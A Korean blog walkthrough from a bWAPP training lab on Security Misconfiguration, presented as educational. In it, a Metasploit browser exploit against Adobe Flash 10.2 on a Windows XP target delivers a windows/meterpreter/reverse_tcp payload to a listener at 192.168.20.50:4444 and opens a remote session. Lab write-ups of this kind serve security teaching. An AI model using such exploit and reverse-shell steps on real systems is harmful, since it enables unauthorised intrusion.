정보보안(구버전)/ bWAPP 2019. 2. 15. 21:11
웹 해킹 bWAPP(작업중) - 64. A5 - Security Misconfiguration - Cross-Domain Policy File(Flash)
본 내용은 교육 과정에서 필요한 실습 목적으로 구성된 것이며, 혹시라도 개인적인 용도 및 악의적인 목적으로 사용할 경우, 법적 책임은 본인에게 있다는 것을 알려드립니다.
1. Security Misconfiguration
- OWASP Top10 A5 - 잘못된 보안 구성
- 서버/시스템/DB/네트워크 장비/웹 설정 요류로 인하여 발생하는 취약점이다.
- Ex) 디렉토리 리스팅, 에러페이지, 웹페이지 주석, 웹서버 기본 설정, Adobe Flash 취약점, DoS/DDos 공격,
특정 서비스에 대한 Reverse_TCP 공격, 로컬 권한 취약점, 백업/임시/robots 파일
2. Security Misconfiguration - Cross-Domain Policy File(Flash)
- 이 시나리오는 Adobe Flash Player 취약점을 이용하여 내용이다.
- WinXP에서 사용할 Adobe Flash Player 10.2.153.1 다운로드 사이트 :
- https://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html#main_Archived_versions
Ex1) Security Misconfiguration - Cross-Domain Policy File(Flash) 이해
보안 레벨 선택 및 시나리오 선택
bWAPP에서 제공하는 Flash 관련 파일들이 제대로 동작하지 않음(메타스플로잇으로 대체할 예정)
메타스플로잇을 이용한 Adobe 취약점 확인(타겟 : WinXP, Adobe Flash Player 10.2.153.1)
root@kali:~# msfconsole -q
srvhost => 192.168.20.50
payload => windows/meterpreter/reverse_tcp
[*] Started reverse TCP handler on 192.168.20.50:4444 |
WinXP에서 'http://192.168.20.50:8080/SPz8Z0HgP58O0'으로 접근 실시
메타스플로잇 세션 연결 확인
[*] 192.168.20.203 adobe_flashplayer_flash10o - Sending HTML to...
msf exploit(windows/browser/adobe_flashplayer_flash10o) > sessions -i
Active sessions Id Name Type Information Connection msf exploit(windows/browser/adobe_flashplayer_flash10o) > sessions -i 1
meterpreter > sysinfo
[*] 192.168.20.203 - Meterpreter session 1 closed. Reason: User exit
[*] Server stopped.
|
[유튜브] 동영상 강의 링크 (구독! 좋아요!!!)
웹해킹 64. A5 - bWAPP Security Misconfiguration - Cross-Domain Policy File(Flash) https://youtu.be/YLfmyOIeJZo